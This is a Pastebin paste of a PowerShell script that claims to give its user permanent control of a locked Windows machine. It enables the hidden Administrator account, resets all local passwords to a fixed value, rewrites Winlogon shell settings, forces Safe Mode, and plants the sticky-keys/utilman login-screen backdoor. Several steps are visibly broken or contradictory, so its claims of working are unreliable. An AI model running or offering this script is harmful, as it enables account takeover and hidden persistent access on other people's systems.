API tools faq
paste
WhosYourDaddySec

SystemOverride.ps1

WhosYourDaddySec
Feb 7th, 2025
33
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.07 KB | None | 0 0
raw download clone embed print report
  1. <#
  2. .SYNOPSIS
  3. One day, I was in a bit of a bind, system locked down, no way in, passwords not set by me, and the machine wouldn't budge. But you know me, always ready with a backup plan. So, I wrote this PowerShell script, using Docker and a few crafty tricks to give myself permanent root access. Now I can always get in, no matter what goes wrong. This is for emergency use only. Don’t go fucking up anyone else's system with this. As tempting as it may be.
  4. #>
  5.  
  6. function Check-NonRoot {
  7. $user = [System.Security.Principal.WindowsIdentity]::GetCurrent()
  8. $isAdmin = [System.Security.Principal.WindowsPrincipal]::new($user).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
  9.  
  10. if ($isAdmin) {
  11. Write-Host "Yo, no need for this script if you're root already. Exit out!" -ForegroundColor Red
  12. exit
  13. }
  14. }
  15.  
  16. Check-NonRoot
  17.  
  18. function Check-Docker {
  19. if (-not (Get-Command docker -ErrorAction SilentlyContinue)) {
  20. Write-Host "Docker is not installed. Install Docker before running this script." -ForegroundColor Red
  21. exit
  22. }
  23.  
  24. $dockerService = Get-Service -Name "com.docker.service" -ErrorAction SilentlyContinue
  25. if ($null -eq $dockerService -or $dockerService.Status -ne 'Running') {
  26. Write-Host "Docker isn’t running. Starting Docker for you..." -ForegroundColor Yellow
  27. Start-Service -Name "com.docker.service"
  28. Start-Sleep -Seconds 5
  29. $dockerService = Get-Service -Name "com.docker.service"
  30. if ($dockerService.Status -ne 'Running') {
  31. Write-Host "Docker still won’t start. You’ll need to fix that manually." -ForegroundColor Red
  32. exit
  33. }
  34. Write-Host "Docker’s up and running. Let’s roll!" -ForegroundColor Green
  35. }
  36. }
  37.  
  38. Check-Docker
  39.  
  40. function Docker-Mount {
  41. Write-Host "[+] Mounting system files via Docker..." -ForegroundColor Green
  42. docker run --rm -it --privileged -v C:\:/mnt windows /bin/sh -c "cmd.exe"
  43. }
  44.  
  45. Docker-Mount
  46.  
  47. function Enable-AdminAccount {
  48. Write-Host "[+] Enabling hidden Administrator account..." -ForegroundColor Green
  49. docker exec -it windows net user Administrator /active:yes
  50. Write-Host "[+] Administrator account enabled. You now have the keys to the kingdom!" -ForegroundColor Green
  51. }
  52.  
  53. Enable-AdminAccount
  54.  
  55. function Reset-UserPassword {
  56. Write-Host "[+] Resetting user passwords to 'GhostSec123!'" -ForegroundColor Green
  57. $users = Get-WmiObject Win32_UserAccount | Where-Object { $_.LocalAccount -eq $true }
  58. foreach ($user in $users) {
  59. docker exec -it windows net user $user.Name "GhostSec123!" /add
  60. Write-Host "[+] Password reset for: $($user.Name). You’re good to go." -ForegroundColor Cyan
  61. }
  62. }
  63.  
  64. Reset-UserPassword
  65.  
  66. function Grant-RootAccess {
  67. Write-Host "[+] Granting permanent root access..." -ForegroundColor Green
  68. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe," /f
  69. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe" /f
  70. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 1 /f
  71. Write-Host "[+] Root access granted. You’re in control now." -ForegroundColor Green
  72. }
  73.  
  74. Grant-RootAccess
  75.  
  76. function Modify-Registry {
  77. Write-Host "[+] Modifying registry for CMD at login screen..." -ForegroundColor Green
  78. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "cmd.exe" /f
  79. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,cmd.exe" /f
  80. Write-Host "[+] Registry updated to always launch CMD. You’re now the system overlord." -ForegroundColor Green
  81. }
  82.  
  83. Modify-Registry
  84.  
  85. function Enable-SafeMode {
  86. Write-Host "[+] Enabling Safe Mode with Networking..." -ForegroundColor Green
  87. docker exec -it windows bcdedit /set {current} safeboot network
  88. Write-Host "[+] Safe Mode enabled. System will boot into Safe Mode on the next restart." -ForegroundColor Cyan
  89. Restart-Computer -Force
  90. }
  91.  
  92. Enable-SafeMode
  93.  
  94. function Enable-CMD {
  95. Write-Host "[+] Enabling CMD at login screen..." -ForegroundColor Green
  96. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
  97. docker exec -it windows reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f
  98. Write-Host "[+] CMD is now accessible from the login screen. Just hit SHIFT five times!" -ForegroundColor Cyan
  99. }
  100.  
  101. Enable-CMD
  102.  
  103. Write-Host "[+] Everything’s done. The system’s now under your control. Reboot and you should be able to log in with 'GhostSec123!' or access via CMD. Enjoy the power, and don’t be a piece of shit." -ForegroundColor Cyan
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!